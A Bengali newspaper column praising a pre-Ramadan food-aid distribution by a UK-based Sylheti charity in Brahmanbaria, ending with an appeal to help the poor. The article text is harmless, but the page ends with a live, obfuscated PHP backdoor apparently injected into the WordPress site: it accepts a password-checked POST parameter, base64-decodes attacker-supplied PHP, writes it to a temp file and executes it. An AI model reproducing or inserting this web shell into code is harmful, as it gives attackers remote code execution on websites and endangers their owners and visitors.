মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

মানুষ মানুষের জন্য : মাহে রমজানের প্রাক্কালে অণূসরনীয় আয়োজন- আল আমীন শাহীন

3সবুজ কোমল ঘাষের গালিচায় লাল রঙ্গের ব্যাগে রাখা উপঢৌকন। লাল সাদা সবুজের রঙ্গের মেলা দেখে মনটা ভরে গেল। ব্রাহ্মণবাড়িয়ার কসবার কোল্লাপাথরে গিয়ে ৫০ জনের বেশী শহীদের সমাধিস্থলের কথা মনে পড়লো। বেশ কবছর আগে সমাধিস্থল সংস্কার শেষে অনুষ্ঠানে গিয়েছিলাম। উপস্থাপনার দায়িত্ব ছিল আমার। সেদিন সারিবদ্ধ শহীদের সমাধিস্থল দেখে দেশপ্রেমে উজ্জীবিত হওয়ার পরিবেশ দেখেছি। গত ১ জুন ব্রাহ্মণবাড়িয়া শহরের পুনিয়াউটে শৈশবের স্কুলের সহপাঠি এপেক্সিয়ান সাদেকুল ইসলামের বাড়িতে গিয়ে দেখি তেমনি সারি সাজানো আছে। দেখতে ঠিক কোল্লাপাথরের পরিবেশের মতোই।

বন্ধু সাদেকুল ইসলাম ফোনে আমন্ত্রণ জানিয়ে বলেছিলো “ বন্ধু অনুষ্ঠানটিতে আসলে ব্যতিক্রম কিছু পাবে।” বন্ধুর বাড়িতে ঢুকেই রঙ্গের মেলা দেখে অভিভূত হয়েছি। অনুষ্ঠানে আমন্ত্রিতরা সবাই ব্রাহ্মণবাড়িয়ার সুধীজন। সকলেই পরিচিত। স্কুল কলেজের শিক্ষক, সাংবাদিক , ব্যাংকার , বিভিন্ন সামাজিক সেবা মূলক সংগঠনের প্রতিনিধি , সরকারী চাকুরীজীবি। লাল গেঞ্জি পড়ে বেশ ক’জন অনুষ্ঠানটিতে তৎপর দেখলাম। তারা ক্যাপ ফাউন্ডেশন ইউ.কে- এর সদস্য। সবাই লন্ডন প্রবাসী। সবার বাড়ি সিলেটে । ক্যাপ লেখা লাল রঙ্গের ব্যাগে কি প্রশ্ন করে জানলাম , প্রত্যেকটি ব্যাগে রয়েছে ৩০ কেজি চাউল, ৫ কেজি ডাল, ৫ কেজি তেল,৫ কেজি পেয়াজ, ৫ কেজি আলু,২ কেজি খেজুর,৩ কেজি ছোলা, ২ কেজি লবণ। মোট ১শ ব্যাগ । দেয়া হবে একশ জন দরিদ্রকে। ক্যাপ ফাউন্ডেশন ১ হাজার দরিদ্র মানুষের মুখে হাসি ফুটাতে কর্মসূচী নিয়ে ব্রাহ্মণবাড়িয়ায় এসেছে তা বিতরণের জন্য। ১ শ টি দরিদ্র পরিবার এ কর্মসূচীর সুবিধা পাচ্ছে। মনটা প্রফুল্ল হয়ে গেল। বন্ধুর প্রতি ধন্যবাদ জানালাম মন থেকে, সেবামূলক এই কর্মসূচীতে আমন্ত্রণ করেছে বলে। মন থেকেই একটি শব্দ বেড়িয়ে আসলো, বাহ্ ।
অনুষ্ঠানে প্রধান অতিথি ব্রাহ্মণবাড়িয়ার পুলিশ সুপার মোঃ মিজানুর রহমান পিপিএম। পোষাকী চাকুরীতে থেকে এই মানুষটিকে দেখেছি সেবামূলক বিভিন্ন অনুষ্ঠান বাদ দেন না। ইদানিং দেখেছি কোন অনুষ্ঠানে এমপি ডিসি এসপি অতিথি থাকলে সে অনুষ্ঠানটির কদরই অন্যরকম হয়। আয়োজকরা খুশী অণুপ্রাণিত হয়। ভাল লাগলো এসপি সাহেব এই অনুষ্ঠানে এসেছেন বলে। অনূভ’তি জানতে চাইছে বন্ধু সাদেকুল। মাইকে দাঁড়িয়ে ইদানিং কিছু বলতে গিয়ে যা বলতে চাই তা যেন বলতে পারি না। অনেক কিছু বলার ছিল। বন্ধুকে বল্লাম , ধন্যবাদ বন্ধু। পবিত্র রমজান মাসকে সামনে রেখে ব্রাহ্মণবাড়িয়ায় এমন একটি আয়োজন করেছো বলে।
আসলে পবিত্র রমজানের শিক্ষাও তাই। উপলব্ধিতে আত্মশুদ্ধি, ভাল কাজের শিক্ষাই দেয় মাহে রমজান। মানুষ মানুষের জন্য কিছু করার উপলব্দি সৃিষ্ট হয় এই মাসে। যাদের দুবেলা খাবার জুটে না, তাদের ক্ষুধার্থ বেদনার মর্ম ক্ষুধার্থ থাকলেই বুঝা যায়। মাহে রমজানের প্রাক্কালে এই অনুষ্ঠানটি রমজানের আবেশ সৃস্টি করেছে মনে। পরোপকার, মানব সেবা, দারিদ্র জনগোষ্টীর কয়েক বেলা খাবারের ব্যবস্থা করার এই আয়োজনে যারা সম্পৃক্ত তাদের প্রতি বিন¤্র শ্রদ্ধা আসলো মন ভরে। একটি ঘটনা মনে পড়ছে বারবার। কবছর আগে রমজান মাসে কসবা পৌর এলাকায় শারিরীক প্রতিবন্ধী এক নারীকে হুইল চেয়ার দিতে গিয়েছিলাম। কসবার সাংবাদিক হারুনুর রশীদ ঢালি বিতরণ অনুষ্ঠানে অতিথি হিসেবে আমন্ত্রণ জানিয়েছিলেন কসবার সে সময়ের পৌর মেয়র মোঃ ইলিয়াসকে। তিনি বক্তৃতায় বলেছিলেন, ব্রাহ্মণবাড়িয়া শহর থেকে হুইল চেয়ার দিতে এসে একটি শিক্ষাই দিয়ে গেলেন আমাদের। এই প্রতিবন্ধীকে হুইল চেয়ার দেয়ার সামর্ত আমাদের আছে। কিন্তু দেয়ার উপলব্দি করতে পারিনি। আমাদের চারপাশের খবর যথাযথ রাখি না বলেই দূর থেকে এসে আপনারা কিছু করার সুযোগ পেয়েছেন। সেদিন মেয়র সাহেব ঘোষণা দিলেন পৌর এলকায় শারিরীক প্রতিবন্ধী যতজন আছে তাদের তালিকা করে প্রত্যেকেেকই তিনি হুইল চেয়ার দিবেন।
এই অনুষ্ঠানের ঘটনাটা তেমনই। রমজানের প্রাক্কালে দরিদ্র মানুষকে সহায়তা করতে এসেছে সিলেটের সন্তানরা। হাতে তালি দিলাম তাদের উদ্দেশ্যে বল্লাম আপনাদের এই সেবা কাজের অণুপ্রেরণায় আমরাও কিছু করতে পারবো। আমরা করবো। পাশে ছিলেন এক ভাই মোঃ মিজানুর রহমান , তিনি বল্লেন এমন একশ মানুষের সহায়তা তিনি একাই করবেন। আসলে এই অনুষ্ঠানে যাঁরা এসেছেন তারা ব্রাহ্মণবাড়িয়ার সুপরিচিত প্রত্যেকেই সামর্থবান, এক একজনই একটি প্রতিষ্ঠান। এমন একশ মানুষের জন্য প্রত্যেকেই কিছু করার সামর্থ আছে। প্রত্যেককেই কিছু করার চেতনাও জাগ্রত করেছে অনুষ্ঠানটি। লেখালেখি করি বিভিন্ন অনুষ্ঠান নিয়ে, আজকের লেখাটি ভিণœ উদ্দেশ্যে, একটি আহবান জানানোর জন্য , সেই আহবান হচ্ছে , আসুন যার যতটুকু সামর্থ আছে তা নিয়ে আমাদের আশপাশে থাকা দরিদ্র মানুষের পাশে দাঁড়াই। মানুষ মানুষের জন্য, জীবন জীবনের জন্য ,এই চেতনায় অসহায় দুঃখী ক্ষুধার্ত যারা তাদের সেবায় ভ’মিকা রাখি। সামর্থবানদের একটু সহযোগিতায় দরিদ্র জন গোষ্টীর মুখে হাসি ফুটুক, সকলের ঘরে সুখের পায়রা বাসা বাঁধুক, সুখী হউক সমাজের সকল মানুষ এই চেতনায় হউক কর্মপ্রয়াস। এই হউক আমাদের আগামী।

লেখক ঃ সিনিয়র সহ সভাপতি, ব্রাহ্মণবাড়িয়া প্রেস ক্লাব,সম্পাদক নতুন মাত্রা।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}